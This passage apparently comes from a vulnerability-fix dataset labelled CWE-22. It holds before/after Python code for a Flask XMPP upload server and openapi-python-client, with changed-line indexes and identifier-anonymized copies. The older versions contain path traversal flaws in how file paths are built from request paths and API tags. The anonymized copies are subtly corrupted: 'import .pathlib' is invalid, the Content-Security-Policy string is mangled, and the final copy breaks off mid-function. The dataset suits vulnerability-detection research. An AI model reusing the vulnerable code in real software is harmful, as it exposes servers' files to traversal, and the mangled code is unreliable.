" pathlib.Path(app.config[\"DATA_ROOT\"]),",
" )",
" data_file, metadata_file = get_paths(dest_path)",
" dest_path = sanitized_join(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"]),",
" )",
" except ValueError:",
" dest_path.parent.mkdir(parents=True, exist_ok=True, mode=0o770)",
" data_file, metadata_file = get_paths(dest_path)",
" data_file, metadata = get_info(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"])",
" )",
" except (OSError, ValueError):",
" data_file, metadata = get_info(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"])",
" )",
" except (OSError, ValueError):"
],
"line_no": [
42,
43,
44,
45,
46,
49,
50,
51,
61,
64,
65,
66,
67,
69,
107,
108,
109,
110,
111,
137,
138,
192,
193,
194,
195,
198,
217,
218,
219,
220,
221
]
} | {
"code": [
"def get_paths(root: str, sub_path: str) \\",
" -> typing.Tuple[pathlib.Path, pathlib.Path]:",
" base_path = flask.safe_join(root, sub_path)",
" data_file = pathlib.Path(base_path + \".data\")",
"def get_info(path: str) -> typing.Tuple[",
" data_file, metadata_file = get_paths(app.config[\"DATA_ROOT\"], path)",
" data_file.parent.mkdir(parents=True, exist_ok=True, mode=0o770)",
" data_file, metadata = get_info(path)",
" except (OSError, werkzeug.exceptions.NotFound):",
" data_file, metadata = get_info(path)",
" except (OSError, werkzeug.exceptions.NotFound):"
],
"line_no": [
43,
44,
45,
46,
57,
98,
125,
179,
182,
201,
202
]
} |
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import .pathlib
import typing
import flask
VAR_0 = flask.Flask("xmpp-http-upload")
VAR_0.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
VAR_1 = VAR_0
if VAR_0.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(VAR_0)
def FUNC_0(VAR_2: str, VAR_3: pathlib.Path) -> pathlib.Path:
VAR_12 = (VAR_3 / VAR_2).absolute()
if not str(VAR_12).startswith(str(VAR_3) + "/"):
raise ValueError("resulting VAR_2 is outside root")
return VAR_12
def FUNC_1(VAR_4: pathlib.Path):
VAR_13 = pathlib.Path(str(VAR_4) + ".data")
VAR_5 = pathlib.Path(str(VAR_4) + ".meta")
return VAR_13, VAR_5
def FUNC_2(VAR_5):
with VAR_5.open("r") as f:
return json.load(f)
def FUNC_3(VAR_2: str, VAR_3: pathlib.Path) -> typing.Tuple[
pathlib.Path,
dict]:
VAR_14 = FUNC_0(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"]),
)
VAR_13, VAR_5 = FUNC_1(VAR_14)
return VAR_13, FUNC_2(VAR_5)
@contextlib.contextmanager
def FUNC_4(VAR_6: pathlib.Path):
with VAR_6.open("xb") as f:
try:
yield f
except: # NOQA
VAR_6.unlink()
raise
@VAR_0.route("/")
def FUNC_5():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def FUNC_6(VAR_7, VAR_8, VAR_9):
while VAR_9 > 0:
VAR_23 = VAR_7.read(min(VAR_9, 4096))
if not VAR_23:
break
VAR_8.write(VAR_23)
VAR_9 -= len(VAR_23)
if VAR_9 > 0:
raise EOFError
@VAR_0.route("/<VAR_2:path>", methods=["PUT"])
def FUNC_7(VAR_2):
try:
VAR_14 = FUNC_0(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"]),
)
except ValueError:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_15 = flask.request.args.get("v", "")
VAR_16 = int(flask.request.headers.get("Content-Length", 0))
VAR_17 = "{} {}".format(VAR_2, VAR_16).encode("utf-8")
VAR_18 = VAR_0.config["SECRET_KEY"]
VAR_19 = hmac.new(VAR_18, VAR_17, hashlib.sha256)
VAR_20 = VAR_19.hexdigest()
if not hmac.compare_digest(VAR_20, VAR_15):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
VAR_21 = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
VAR_14.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
VAR_13, VAR_5 = FUNC_1(VAR_14)
try:
with FUNC_4(VAR_13) as fout:
FUNC_6(flask.request.stream, fout, VAR_16)
with VAR_5.open("x") as f:
json.dump(
{
"headers": {"Content-Type": VAR_21},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def FUNC_8(VAR_10, VAR_11):
for VAR_18, value in VAR_11.items():
VAR_10[VAR_18] = value
VAR_21 = VAR_11["Content-Type"]
for mimetype_glob in VAR_0.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(VAR_21, mimetype_glob):
break
else:
VAR_10["Content-Disposition"] = "attachment"
VAR_10["X-Content-Type-Options"] = "nosniff"
VAR_10["X-Frame-Options"] = "DENY"
VAR_10["Content-Security-Policy"] = "default-VAR_7 'none'; frame-ancestors 'none'; sandbox"
@VAR_0.route("/<VAR_2:path>", methods=["HEAD"])
def FUNC_9(VAR_2):
try:
VAR_13, VAR_24 = FUNC_3(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"])
)
VAR_25 = VAR_13.stat()
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_22 = flask.Response()
VAR_22.headers["Content-Length"] = str(VAR_25.st_size)
FUNC_8(
VAR_22.headers,
VAR_24["headers"],
)
return VAR_22
@VAR_0.route("/<VAR_2:path>", methods=["GET"])
def FUNC_10(VAR_2):
try:
VAR_13, VAR_24 = FUNC_3(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"])
)
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_22 = flask.make_response(flask.send_file(
str(VAR_13),
))
FUNC_8(
VAR_22.headers,
VAR_24["headers"],
)
return VAR_22
|
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import .pathlib
import typing
import flask
import werkzeug.exceptions
VAR_0 = flask.Flask("xmpp-http-upload")
VAR_0.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
VAR_1 = VAR_0
if VAR_0.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(VAR_0)
def FUNC_0(VAR_2: str, VAR_3: str) \
-> typing.Tuple[pathlib.Path, pathlib.Path]:
VAR_12 = flask.safe_join(VAR_2, VAR_3)
VAR_13 = pathlib.Path(VAR_12 + ".data")
VAR_4 = pathlib.Path(VAR_12 + ".meta")
return VAR_13, VAR_4
def FUNC_1(VAR_4):
with VAR_4.open("r") as f:
return json.load(f)
def FUNC_2(VAR_5: str) -> typing.Tuple[
pathlib.Path,
dict]:
VAR_13, VAR_4 = FUNC_0(VAR_0.config["DATA_ROOT"], VAR_5)
return VAR_13, FUNC_1(VAR_4)
@contextlib.contextmanager
def FUNC_3(VAR_6: pathlib.Path):
with VAR_6.open("xb") as f:
try:
yield f
except: # NOQA
VAR_6.unlink()
raise
@VAR_0.route("/")
def FUNC_4():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def FUNC_5(VAR_7, VAR_8, VAR_9):
while VAR_9 > 0:
VAR_22 = VAR_7.read(min(VAR_9, 4096))
if not VAR_22:
break
VAR_8.write(VAR_22)
VAR_9 -= len(VAR_22)
if VAR_9 > 0:
raise EOFError
@VAR_0.route("/<VAR_5:path>", methods=["PUT"])
def FUNC_6(VAR_5):
try:
VAR_13, VAR_4 = FUNC_0(VAR_0.config["DATA_ROOT"], VAR_5)
except werkzeug.exceptions.NotFound:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_14 = flask.request.args.get("v", "")
VAR_15 = int(flask.request.headers.get("Content-Length", 0))
VAR_16 = "{} {}".format(VAR_5, VAR_15).encode("utf-8")
VAR_17 = VAR_0.config["SECRET_KEY"]
VAR_18 = hmac.new(VAR_17, VAR_16, hashlib.sha256)
VAR_19 = VAR_18.hexdigest()
if not hmac.compare_digest(VAR_19, VAR_14):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
VAR_20 = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
VAR_13.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
try:
with FUNC_3(VAR_13) as fout:
FUNC_5(flask.request.stream, fout, VAR_15)
with VAR_4.open("x") as f:
json.dump(
{
"headers": {"Content-Type": VAR_20},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def FUNC_7(VAR_10, VAR_11):
for VAR_17, value in VAR_11.items():
VAR_10[VAR_17] = value
VAR_20 = VAR_11["Content-Type"]
for mimetype_glob in VAR_0.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(VAR_20, mimetype_glob):
break
else:
VAR_10["Content-Disposition"] = "attachment"
VAR_10["X-Content-Type-Options"] = "nosniff"
VAR_10["X-Frame-Options"] = "DENY"
VAR_10["Content-Security-Policy"] = "default-VAR_7 'none'; frame-ancestors 'none'; sandbox"
@VAR_0.route("/<VAR_5:path>", methods=["HEAD"])
def FUNC_8(VAR_5):
try:
VAR_13, VAR_23 = FUNC_2(VAR_5)
VAR_24 = VAR_13.stat()
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_21 = flask.Response()
VAR_21.headers["Content-Length"] = str(VAR_24.st_size)
FUNC_7(
VAR_21.headers,
VAR_23["headers"],
)
return VAR_21
@VAR_0.route("/<VAR_5:path>", methods=["GET"])
def FUNC_9(VAR_5):
try:
VAR_13, VAR_23 = FUNC_2(VAR_5)
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_21 = flask.make_response(flask.send_file(
str(VAR_13),
))
FUNC_7(
VAR_21.headers,
VAR_23["headers"],
)
return VAR_21
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
30,
32,
36,
40,
41,
47,
48,
52,
54,
55,
59,
60,
68,
70,
72,
73,
82,
83,
90,
91,
99,
102,
103,
117,
124,
131,
136,
139,
143,
165,
171,
172,
176,
183,
187,
188,
196,
204,
212,
213,
227,
236
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
30,
33,
37,
41,
42,
48,
50,
51,
55,
56,
61,
63,
64,
73,
74,
81,
82,
90,
93,
94,
105,
112,
119,
124,
126,
130,
152,
158,
159,
163,
170,
174,
175,
180,
188,
196,
197,
208,
217
] |
0CWE-22
| """ Generate modern Python clients from OpenAPI """
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def _get_project_for_url_or_path(url: Optional[str], path: Optional[Path]) -> Union[Project, GeneratorError]:
data_dict = _get_document(url=url, path=path)
if isinstance(data_dict, GeneratorError):
return data_dict
openapi = GeneratorData.from_dict(data_dict)
if isinstance(openapi, GeneratorError):
return openapi
return Project(openapi=openapi)
def create_new_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Generate the client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.build()
def update_existing_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Update an existing client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.update()
def _get_document(*, url: Optional[str], path: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
yaml_bytes: bytes
if url is not None and path is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if url is not None:
try:
response = httpx.get(url)
yaml_bytes = response.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif path is not None:
yaml_bytes = path.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(yaml_bytes)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class Project:
TEMPLATE_FILTERS = {"snakecase": utils.snake_case, "spinalcase": utils.spinal_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, openapi: GeneratorData) -> None:
self.openapi: GeneratorData = openapi
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{openapi.title.replace(' ', '-').lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = openapi.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def build(self) -> Sequence[GeneratorError]:
""" Create the project from templates """
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the update command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def update(self) -> Sequence[GeneratorError]:
""" Update an existing project """
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def _reformat(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def _get_errors(self) -> Sequence[GeneratorError]:
errors = []
for collection in self.openapi.endpoint_collections_by_tag.values():
errors.extend(collection.parse_errors)
errors.extend(self.openapi.schemas.errors)
return errors
def _create_package(self) -> None:
self.package_dir.mkdir()
# Package __init__.py
package_init = self.package_dir / "__init__.py"
package_init_template = self.env.get_template("package_init.pyi")
package_init.write_text(package_init_template.render(description=self.package_description))
pytyped = self.package_dir / "py.typed"
pytyped.write_text("# Marker file for PEP 561")
def _build_metadata(self) -> None:
# Create a pyproject.toml file
pyproject_template = self.env.get_template("pyproject.toml")
pyproject_path = self.project_dir / "pyproject.toml"
pyproject_path.write_text(
pyproject_template.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
# README.md
readme = self.project_dir / "README.md"
readme_template = self.env.get_template("README.md")
readme.write_text(
readme_template.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
# .gitignore
git_ignore_path = self.project_dir / ".gitignore"
git_ignore_template = self.env.get_template(".gitignore")
git_ignore_path.write_text(git_ignore_template.render())
def _build_models(self) -> None:
# Generate models
models_dir = self.package_dir / "models"
models_dir.mkdir()
models_init = models_dir / "__init__.py"
imports = []
types_template = self.env.get_template("types.py")
types_path = models_dir / "types.py"
types_path.write_text(types_template.render())
model_template = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
module_path = models_dir / f"{model.reference.module_name}.py"
module_path.write_text(model_template.render(model=model))
imports.append(import_string_from_reference(model.reference))
# Generate enums
enum_template = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
module_path = models_dir / f"{enum.reference.module_name}.py"
module_path.write_text(enum_template.render(enum=enum))
imports.append(import_string_from_reference(enum.reference))
models_init_template = self.env.get_template("models_init.pyi")
models_init.write_text(models_init_template.render(imports=imports))
def _build_api(self) -> None:
# Generate Client
client_path = self.package_dir / "client.py"
client_template = self.env.get_template("client.pyi")
client_path.write_text(client_template.render())
# Generate endpoints
api_dir = self.package_dir / "api"
api_dir.mkdir()
api_init = api_dir / "__init__.py"
api_init.write_text('""" Contains synchronous methods for accessing the API """')
async_api_dir = self.package_dir / "async_api"
async_api_dir.mkdir()
async_api_init = async_api_dir / "__init__.py"
async_api_init.write_text('""" Contains async methods for accessing the API """')
api_errors = self.package_dir / "errors.py"
errors_template = self.env.get_template("errors.pyi")
api_errors.write_text(errors_template.render())
endpoint_template = self.env.get_template("endpoint_module.pyi")
async_endpoint_template = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
module_path = api_dir / f"{tag}.py"
module_path.write_text(endpoint_template.render(collection=collection))
async_module_path = async_api_dir / f"{tag}.py"
async_module_path.write_text(async_endpoint_template.render(collection=collection))
| """ Generate modern Python clients from OpenAPI """
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def _get_project_for_url_or_path(url: Optional[str], path: Optional[Path]) -> Union[Project, GeneratorError]:
data_dict = _get_document(url=url, path=path)
if isinstance(data_dict, GeneratorError):
return data_dict
openapi = GeneratorData.from_dict(data_dict)
if isinstance(openapi, GeneratorError):
return openapi
return Project(openapi=openapi)
def create_new_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Generate the client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.build()
def update_existing_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Update an existing client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.update()
def _get_document(*, url: Optional[str], path: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
yaml_bytes: bytes
if url is not None and path is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if url is not None:
try:
response = httpx.get(url)
yaml_bytes = response.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif path is not None:
yaml_bytes = path.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(yaml_bytes)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class Project:
TEMPLATE_FILTERS = {"snakecase": utils.snake_case, "kebabcase": utils.kebab_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, openapi: GeneratorData) -> None:
self.openapi: GeneratorData = openapi
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{utils.kebab_case(openapi.title).lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = openapi.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def build(self) -> Sequence[GeneratorError]:
""" Create the project from templates """
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the update command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def update(self) -> Sequence[GeneratorError]:
""" Update an existing project """
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def _reformat(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def _get_errors(self) -> Sequence[GeneratorError]:
errors = []
for collection in self.openapi.endpoint_collections_by_tag.values():
errors.extend(collection.parse_errors)
errors.extend(self.openapi.schemas.errors)
return errors
def _create_package(self) -> None:
self.package_dir.mkdir()
# Package __init__.py
package_init = self.package_dir / "__init__.py"
package_init_template = self.env.get_template("package_init.pyi")
package_init.write_text(package_init_template.render(description=self.package_description))
pytyped = self.package_dir / "py.typed"
pytyped.write_text("# Marker file for PEP 561")
def _build_metadata(self) -> None:
# Create a pyproject.toml file
pyproject_template = self.env.get_template("pyproject.toml")
pyproject_path = self.project_dir / "pyproject.toml"
pyproject_path.write_text(
pyproject_template.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
# README.md
readme = self.project_dir / "README.md"
readme_template = self.env.get_template("README.md")
readme.write_text(
readme_template.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
# .gitignore
git_ignore_path = self.project_dir / ".gitignore"
git_ignore_template = self.env.get_template(".gitignore")
git_ignore_path.write_text(git_ignore_template.render())
def _build_models(self) -> None:
# Generate models
models_dir = self.package_dir / "models"
models_dir.mkdir()
models_init = models_dir / "__init__.py"
imports = []
types_template = self.env.get_template("types.py")
types_path = models_dir / "types.py"
types_path.write_text(types_template.render())
model_template = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
module_path = models_dir / f"{model.reference.module_name}.py"
module_path.write_text(model_template.render(model=model))
imports.append(import_string_from_reference(model.reference))
# Generate enums
enum_template = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
module_path = models_dir / f"{enum.reference.module_name}.py"
module_path.write_text(enum_template.render(enum=enum))
imports.append(import_string_from_reference(enum.reference))
models_init_template = self.env.get_template("models_init.pyi")
models_init.write_text(models_init_template.render(imports=imports))
def _build_api(self) -> None:
# Generate Client
client_path = self.package_dir / "client.py"
client_template = self.env.get_template("client.pyi")
client_path.write_text(client_template.render())
# Generate endpoints
api_dir = self.package_dir / "api"
api_dir.mkdir()
api_init = api_dir / "__init__.py"
api_init.write_text('""" Contains synchronous methods for accessing the API """')
async_api_dir = self.package_dir / "async_api"
async_api_dir.mkdir()
async_api_init = async_api_dir / "__init__.py"
async_api_init.write_text('""" Contains async methods for accessing the API """')
api_errors = self.package_dir / "errors.py"
errors_template = self.env.get_template("errors.pyi")
api_errors.write_text(errors_template.render())
endpoint_template = self.env.get_template("endpoint_module.pyi")
async_endpoint_template = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
tag = utils.snake_case(tag)
module_path = api_dir / f"{tag}.py"
module_path.write_text(endpoint_template.render(collection=collection))
async_module_path = async_api_dir / f"{tag}.py"
async_module_path.write_text(async_endpoint_template.render(collection=collection))
| path_disclosure | {
"code": [
" TEMPLATE_FILTERS = {\"snakecase\": utils.snake_case, \"spinalcase\": utils.spinal_case}",
" self.project_name: str = self.project_name_override or f\"{openapi.title.replace(' ', '-').lower()}-client\""
],
"line_no": [
86,
94
]
} | {
"code": [
" TEMPLATE_FILTERS = {\"snakecase\": utils.snake_case, \"kebabcase\": utils.kebab_case}",
" self.project_name: str = self.project_name_override or f\"{utils.kebab_case(openapi.title).lower()}-client\"",
" tag = utils.snake_case(tag)"
],
"line_no": [
86,
94,
234
]
} |
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def FUNC_0(VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[CLASS_0, GeneratorError]:
VAR_2 = FUNC_3(VAR_0=url, VAR_1=path)
if isinstance(VAR_2, GeneratorError):
return VAR_2
VAR_3 = GeneratorData.from_dict(VAR_2)
if isinstance(VAR_3, GeneratorError):
return VAR_3
return CLASS_0(VAR_3=openapi)
def FUNC_1(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.build()
def FUNC_2(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.update()
def FUNC_3(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
VAR_35: bytes
if VAR_0 is not None and VAR_1 is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if VAR_0 is not None:
try:
VAR_34 = httpx.get(VAR_0)
VAR_35 = VAR_34.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif VAR_1 is not None:
VAR_35 = VAR_1.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(VAR_35)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class CLASS_0:
VAR_5 = {"snakecase": utils.snake_case, "spinalcase": utils.spinal_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, VAR_3: GeneratorData) -> None:
self.openapi: GeneratorData = VAR_3
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{VAR_3.title.replace(' ', '-').lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = VAR_3.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def FUNC_4(self) -> Sequence[GeneratorError]:
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the FUNC_5 command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_5(self) -> Sequence[GeneratorError]:
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_6(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def FUNC_7(self) -> Sequence[GeneratorError]:
VAR_6 = []
for collection in self.openapi.endpoint_collections_by_tag.values():
VAR_6.extend(collection.parse_errors)
VAR_6.extend(self.openapi.schemas.errors)
return VAR_6
def FUNC_8(self) -> None:
self.package_dir.mkdir()
VAR_7 = self.package_dir / "__init__.py"
VAR_8 = self.env.get_template("package_init.pyi")
VAR_7.write_text(VAR_8.render(description=self.package_description))
VAR_9 = self.package_dir / "py.typed"
VAR_9.write_text("# Marker file for PEP 561")
def FUNC_9(self) -> None:
VAR_10 = self.env.get_template("pyproject.toml")
VAR_11 = self.project_dir / "pyproject.toml"
VAR_11.write_text(
VAR_10.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
VAR_12 = self.project_dir / "README.md"
VAR_13 = self.env.get_template("README.md")
VAR_12.write_text(
VAR_13.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
VAR_14 = self.project_dir / ".gitignore"
VAR_15 = self.env.get_template(".gitignore")
VAR_14.write_text(VAR_15.render())
def FUNC_10(self) -> None:
VAR_16 = self.package_dir / "models"
VAR_16.mkdir()
VAR_17 = VAR_16 / "__init__.py"
VAR_18 = []
VAR_19 = self.env.get_template("types.py")
VAR_20 = VAR_16 / "types.py"
VAR_20.write_text(VAR_19.render())
VAR_21 = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
VAR_36 = VAR_16 / f"{model.reference.module_name}.py"
VAR_36.write_text(VAR_21.render(model=model))
VAR_18.append(import_string_from_reference(model.reference))
VAR_22 = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
VAR_36 = VAR_16 / f"{enum.reference.module_name}.py"
VAR_36.write_text(VAR_22.render(enum=enum))
VAR_18.append(import_string_from_reference(enum.reference))
VAR_23 = self.env.get_template("models_init.pyi")
VAR_17.write_text(VAR_23.render(VAR_18=imports))
def FUNC_11(self) -> None:
VAR_24 = self.package_dir / "client.py"
VAR_25 = self.env.get_template("client.pyi")
VAR_24.write_text(VAR_25.render())
VAR_26 = self.package_dir / "api"
VAR_26.mkdir()
VAR_27 = VAR_26 / "__init__.py"
VAR_27.write_text('""" Contains synchronous methods for accessing the API """')
VAR_28 = self.package_dir / "async_api"
VAR_28.mkdir()
VAR_29 = VAR_28 / "__init__.py"
VAR_29.write_text('""" Contains async methods for accessing the API """')
VAR_30 = self.package_dir / "errors.py"
VAR_31 = self.env.get_template("errors.pyi")
VAR_30.write_text(VAR_31.render())
VAR_32 = self.env.get_template("endpoint_module.pyi")
